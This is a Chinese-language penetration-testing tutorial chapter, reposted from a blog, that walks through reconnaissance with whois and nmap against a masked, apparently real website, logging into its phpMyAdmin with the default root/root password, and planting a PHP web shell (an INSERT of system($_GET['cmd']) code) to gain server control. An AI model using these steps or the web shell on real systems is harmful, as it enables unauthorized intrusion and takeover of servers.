目錄
1.4 小試牛刀
1.4.1 信息蒐集
whois查詢
服務指紋識別
端口掃描
綜合性掃描
1.4.2 發現漏洞
1.4.3 攻擊與權限維持
1.4 小試牛刀
本節作爲第一章的最後一節,給大家展示一個滲透測試的簡單示例。該示例操作簡單,環境真實,主要是爲了給您一個整體上的感知,同時提升學習滲透測試的興趣。滲透測試的每一步並沒有記錄完整的細節信息。
首先,我選擇了一個測試站點,下面對該站點www.xxxxoooo.cn,下面對其進行滲透測試。
1.4.1 信息蒐集
whois查詢
因爲是cn域名,直接到http://ewhois.cnnic.net.cn查詢,更方便。
結果如下:
服務指紋識別
很多個人站點,都沒有自定義錯誤信息的習慣。在url上隨便輸入一個不存在的地址,看是否會返回有用的信息。
通過上圖,我們知道該站點的應用程序由php編寫,web服務器爲Apathe/2.2.22,操作系統爲Ubuntu。
下面我們通過指紋識別工具,進行識別。
在終端啓動nmap,輸入如下命令:
nmap -A -T4 www.xxxxoooo.cn
如圖,識別出來的服務和系統信息與報錯信息一致。
端口掃描
在終端執行如下命令,使用nmap的tcp半開掃描方式來掃描打開的端口。
nmap -sS <targetiste>
綜合性掃描
該站點是需要登錄的,所以在非登錄情況下,常規掃描一般情況下意義不大。但是做一個基本的站點掃描還是必須的。當然很多工具是支持登錄掃描的。
因爲是web應用,一般情況下,我們是需要進行完整的web應用的漏洞掃描的。本實例忽略此步驟。
1.4.2 發現漏洞
對於web應用,我們通常從操作系統、服務、應用本身三個方面來挖掘漏洞。
從站點應用上分析,一般的php程序會安裝phpmyadmin組件,用來管理數據庫。google一下,我們就會知道phpmyadmin 默認安裝在站點根目錄下。測試一下當前站點是否也在默認目錄下安裝了phpmyadmin呢?
ok,確實存在phpmyadmin。
繼續google “phpmyadmin 默認用戶名密碼”。Googele之後,我們知道:“phpMyAdmin默認使用的是MySQL的帳戶和密碼”。MySql的默認賬戶是root,默認密碼是空,但是phpmyadmin是不允許空密碼的。
繼續 Google“inurl: phpmyadmin”,可以看到很多關於phpmyadmin的文章。
這些文章略過,google“hack phpmyadmin”,看看有什麼發現?
在這篇文章《Hacking PHPMyadmin (when import.php deleted)》(https://www.facebook.com/learnadvhacking/posts/556247631077238)中,我注意到
很多站點都配置默認密碼爲root。是不是也可以嘗試下呢?
輸入用戶名root,密碼root,奇蹟就這麼出現了,直接登錄管理後臺。
進入後臺之後,我們得到了更爲詳盡的信息,爲我們下一步攻擊打下了基礎
1.4.3 攻擊與權限維持
上面的步驟,我們完成了對網站數據庫的攻擊,其實拿到了網站數據庫,就是拿到了整個網站的控制權。
如何利用phpmyadmin進行提權,從而得到服務器的控制權呢?
目前在phpmyadmin後臺,我們可以操作表,向表中寫數據,如果數據庫有權限dump數據到web站點所在的文件夾,那麼可以先將一個網馬寫到數據庫再保存到磁盤本地,再從瀏覽器訪問網馬,是不是就可以了呢?
首先在phpmyadmin後臺找到一個數據庫,在“SQL”選項卡執行sql語句創建一個表“hacker”。
語句執行成功後,再插入一條數據,代碼很簡單,希望能用php的system函數執行系統指令。
INSERT INTO hacker (packet)
VALUES(
'<pre><body bgcolor=silver><? @system($_GET["cmd"]); ?></body></pre>'
);
下一步就是保存插入的記錄到站點目錄下,但是站點的物理路徑是什麼呢?我在觀察頁面請求鏈接的時候,發現一個404鏈接。
404鏈接的路徑是http://www.xxxxx.cn/var/www/productions/22_production.zip。這個是進行網站開發時候常犯的靜態鏈接的錯誤,那是不是說網站的根目錄在”/var/www”下呢,我把去掉”/var/www”,文件可以被正常訪問。其實這也是ubuntu默認的站點目錄。接下來就試試有沒有權限保存文件了。
經過一番查找,終於找到一個有寫權限的目錄,將網馬寫到web目錄中,得到了webshell,接下來就不用詳解了吧。
小結
這個簡單的小例子,只是想告訴大家,滲透測試有什麼並沒有那麼困難。也沒有哪種方法,哪個工具或者平臺是萬能的,最重要的是你自己的努力和思考。
從下一節開始,我們正式進入滲透測試的學習之旅。
2.1節--《DNS信息蒐集》。
轉自:http://blog.chinaunix.net/uid-26349264-id-4046363.html